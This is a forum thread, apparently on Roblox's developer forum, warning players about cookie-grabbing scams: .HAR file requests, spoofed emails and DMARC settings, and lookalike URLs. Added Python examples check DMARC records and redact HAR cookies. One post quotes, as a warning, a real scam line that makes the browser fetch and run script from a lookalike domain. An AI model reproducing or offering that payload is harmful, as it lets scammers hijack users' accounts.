I appreciate you reminding us of this.
Two words: cookie grabbing. It should be mentioned that anyone suspicious, e.g. scammers, is getting players to follow a tutorial that has them just release a file that includes their cookie, for example a .HAR file.
Just to add something to the post: I highly recommend checking if the email is a real Roblox email and is not just an email address owned by Roblox being spoofed. If you do not know what email spoofing is, it is basically just someone sending messages which look like they are from a domain they don't own (it will not really be sent from that domain; it is just the way emails work that makes them look like they came from that user). Highly unlikely with Roblox, due to them only using the main domain for emails I believe; however, someone could spoof an email with a subdomain (e.g. security.roblox.com) due to the DMARC record being set to "none".
@lycheeperson10 Someone at Roblox might want to look at the above! Not a major issue, due to the main domain name having a DMARC record set to none and the subdomain not really being used, but still someone could trick others using this!
If you're unsure how to check if an email is being spoofed, or just want to learn more about how emails can be spoofed, I highly recommend this YouTube video below:
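As an added example (not code from anyone in this thread), this is how the DMARC point raised above can be checked once a domain's `_dmarc` TXT record has been fetched: the `p` tag is the policy for the domain and, per RFC 7489, the optional `sp` tag is the policy for subdomains, which otherwise inherit `p`. A policy of `none` only asks receivers to report, so a spoofed From: address is still delivered. The records below are constructed for illustration and are not Roblox's real records.

```python
"""Assess a DMARC TXT record for spoofability of the domain and its subdomains.

Added example, not code from the thread. Assumes the record text has already
been fetched (TXT record at _dmarc.<domain>) and is passed in as a string.
"""


def parse_dmarc(record: str) -> dict:
    """Split 'v=DMARC1; p=none; rua=...' into a lowercase-keyed tag dictionary."""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def dmarc_assessment(record: str) -> dict:
    """Return the effective policy for the domain and for its subdomains.

    'sp' governs subdomains; when absent they inherit 'p' (RFC 7489 6.3).
    A 'none' policy means receivers are asked only to report, not to
    quarantine or reject, so a spoofed mail is still delivered.
    """
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return {"valid": False}
    # 'p' is mandatory in a valid record; a missing value is treated as 'none'
    domain_policy = tags.get("p", "none").lower()
    subdomain_policy = tags.get("sp", domain_policy).lower()
    return {
        "valid": True,
        "domain_policy": domain_policy,
        "subdomain_policy": subdomain_policy,
        "spoofable_domain": domain_policy == "none",
        # e.g. the security.<domain> case discussed in the thread
        "spoofable_subdomain": subdomain_policy == "none",
    }


# Constructed sample records (example.com, not real published records)
WEAK_RECORD = "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"
STRONG_RECORD = "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc@example.com"
MIXED_RECORD = "v=DMARC1; p=reject; sp=none"  # main domain protected, subdomains not

if __name__ == "__main__":
    for name, rec in [("weak", WEAK_RECORD), ("strong", STRONG_RECORD), ("mixed", MIXED_RECORD)]:
        print(name, dmarc_assessment(rec))
```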
IIRC they are already encrypted, although there isn't much point in that because they are accepted as encrypted when authenticating.
There is another type of hacking that is going around. Basically the hacker deceives you into pasting JavaScript into the search bar.
The Details
This is the code that one particular video tells you to paste. DO NOT PASTE THIS CODE (just for education purposes and for employees to see): +Javascript:$.get("//configure"+"roblox.com/api/catalog/promo/halloween50newuser.js") They make it actually look a little legit to the untrained eye.
The problem is made worse by videos like these.
Here is the video link. DO NOT FOLLOW THE STEPS IN THE VIDEO, YOU WILL GET HACKED.
ROBLOX- GET ANY ITEM ON THE CATALOG FOR 50% OFF (HEADLESS HORSEMAN FOR 15,500 R$!) - YouTube
This video has been up for years and has over 100k views. This is an example of one of the many hacking methods I commonly see.
How would you do that? Roblox already enforces the httpOnly flag on security cookies to lower the chances of an XSS attack. Cookies are stored on your PC, so for example if a player is tricked into installing something like a "free robux app", it can steal the cookies.
So as a general rule, all Roblox URLs will contain "[something].roblox.com", i.e. create.roblox.com, developer.roblox.com, as well as www.roblox.com among others.
The main point is to be aware of URLs which contain variants such as "roblox.com.[something]", as an example.
That is official for mobile links. We are looking into standardizing them going forward. Stay tuned!
I have never had the option in the US
What exactly do you mean by this? I would like it to use share.roblox.com, but it's completely empty. ro.blox.com returns an unauthorized error, and blox.com returns to the homepage.
edit: It changed; it used to be an empty API endpoint, but now it returns "OK".
If you're looking into educating users on off-site scams, you should add something regarding the .har file scam. There are two I've come across personally:
1- Person says they'll give you Robux in exchange for your "avatar file"; they get you to upload a .har file to a "har to obj" converter, which in reality uploads it to a database somewhere. They usually attach a video of someone following this process; this video usually depicts a clip of someone rich/reputable doing this (which is usually just clips taken out of context, mashed together to create a surprisingly believable product) to get the person being scammed to trust them.
2- A person messaged me on Discord with the same type of message (avatar to be used in-game); however, instead of uploading the file to a .har to .obj "converter", you upload the .har file directly to them on Discord.
Just don't upload any files to strangers on the internet, especially if these people message you randomly.
Do .har files contain your cookie or something? As far as I know your har file is just your avatar.
Due to the way that email is designed, it's pretty easy to spoof emails that look like legitimate emails. The trick, though, is origin, where the address for @roblox.com emails would point to an email server that originates from Roblox. Still, you can send a perfectly legit-looking email using a @roblox.com email through spoofing. So, personally, this point only applies to very rudimentary phish attempts.
Otherwise, the majority of these issues stem from Roblox's young user base, who are predominantly not actual developers, so the visibility of this announcement/PSA will not reach the members who are actively being targeted. In regards to that, the platform needs to do more in targeting these announcements to actual players instead of just developers.
This is an issue on the majority of platforms, but at some point a line needs to be drawn and the user who fell for said phish needs to take responsibility for their own actions. That is how the world works. I feel that Roblox is essentially trying to make up for the lack of online safety instruction that parents should've taught. Unfortunately, losing something is how you grow and hopefully how you realize that certain actions you make can lead to serious consequences.
Regardless of how anyone tries to spin it, how a phish attempt is engineered or whatnot, this platform is specifically designed in such a way where you have to give your details to them. If they successfully get your details, it's simply because you gave them. Whether you realize that or not is completely up to you and, unfortunately, probably too late.
The only way for this not to be the case is if your details are leaked either through you, a friend, etc., through a breach on Roblox's end, or, if we really wanted to be radical, someone tapping your connection between your router/phone and an ISP/tower.
I see a lot of people on this platform blame Roblox for having poor security, and while I agree in some aspects, this in particular is not their fault. Every company faces these issues and everyone is susceptible. However, most platform users take responsibility because the age deems it so. On this platform, it's incredibly toxic and turns into "omg Roblox security sucks, give me my account back".
Start solving this problem by getting younger users to understand/conceptualize responsibility and what it means to be responsible for your account. With the guides and such already in place regarding this topic, there's really nothing else this platform should be doing.
The solution here is simple: if you really value your account, don't trust anyone with it but you.
Edit: Free will on an open forum dictates expressional freedom. Take this how you want. This is my personal view on said topic. This is not aimed toward anyone and is not meant to offend anyone. It's simply, quite plainly, how I feel about this.
A HAR file (HTTP dump) contains captured data from your web browser. It's typically used for debugging, performance bottleneck review, etc., but people have been using it to grab cookies. Data, including all network information, is captured on a per-session basis. This means that any data sent between the client (browser) and Roblox's servers is captured in this file. This includes headers (where cookies are passed), URLs, etc. If anyone asks you for a HAR file, they're definitely malicious.
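To make the point of the reply above and of the "avatar file" scam posts concrete, here is an added example (not code from anyone in this thread) that opens a HAR file, lists every request or response carrying cookie or authorization material, and produces a redacted copy that is safe to hand to a support engineer. The HAR below is constructed to mimic the structure browsers export; the hosts and cookie values are made up.

```python
"""Inspect and redact credential material in a HAR file before sharing it.

Added example, not code posted in the thread. SAMPLE_HAR is a constructed
HAR 1.2 document with made-up hosts and cookie values.
"""
import json

# Header names that carry session or credential material (case-insensitive)
SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization"}

# Constructed HAR: two requests; the first sends a session cookie, the second receives one.
SAMPLE_HAR = json.dumps({"log": {"version": "1.2", "entries": [
    {"request": {"method": "GET", "url": "https://www.example.com/home",
                 "headers": [{"name": "Cookie", "value": "session=abc123secret"}],
                 "cookies": [{"name": "session", "value": "abc123secret"}]},
     "response": {"status": 200, "headers": [], "cookies": []}},
    {"request": {"method": "GET", "url": "https://cdn.example.com/logo.png",
                 "headers": [{"name": "Accept", "value": "image/png"}], "cookies": []},
     "response": {"status": 200,
                  "headers": [{"name": "Set-Cookie", "value": "tracker=xyz; Path=/"}],
                  "cookies": [{"name": "tracker", "value": "xyz"}]}},
]}})


def find_cookie_leaks(har_text: str) -> list:
    """Return (url, direction, field) for every place credential material appears."""
    har = json.loads(har_text)
    leaks = []
    for entry in har["log"]["entries"]:
        url = entry["request"]["url"]
        for direction in ("request", "response"):
            for hdr in entry[direction].get("headers", []):
                if hdr["name"].lower() in SENSITIVE_HEADERS:
                    leaks.append((url, direction, hdr["name"]))
            if entry[direction].get("cookies"):  # HAR also lists parsed cookies
                leaks.append((url, direction, "cookies[]"))
    return leaks


def redact_har(har_text: str) -> str:
    """Return a copy of the HAR with cookie/authorization values replaced."""
    har = json.loads(har_text)
    for entry in har["log"]["entries"]:
        for direction in ("request", "response"):
            for hdr in entry[direction].get("headers", []):
                if hdr["name"].lower() in SENSITIVE_HEADERS:
                    hdr["value"] = "[REDACTED]"
            for cookie in entry[direction].get("cookies", []):
                cookie["value"] = "[REDACTED]"
    return json.dumps(har)


if __name__ == "__main__":
    for url, direction, field in find_cookie_leaks(SAMPLE_HAR):
        print(f"credential material in {direction} {field} for {url}")
```

Run the same `find_cookie_leaks` over a real export (`json.load(open("session.har"))`) to see how many entries carry the session cookie, which is exactly what the scammers in this thread are after.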
No longer an issue.
(Intentional)
It's a good security measure that IP changes invalidate the cookie, but it seems a bit inconsistent? Personally, using a VPN hasn't logged me out. Even if it did, I still wouldn't want anyone having my cookie anyway; it's also a good idea to advise people that these scams do exist anyway.
It doesn't depend on your IP. The title of the bug report is misleading. It's based on your location change.
Let's say your IP changes to another IP that's in the same state or country as you are. There's a chance that it won't log you out.
But let's say your IP changes from the US to the UK. Then it will invalidate the cookie.
Ohhh okay, that makes more sense. On the chance that the person attempting to gain access to my account is somewhere near me (country is somewhat likely, province isn't), I would still refrain from giving out the cookie lmao. Regardless, it is still a good and frankly much needed security measure.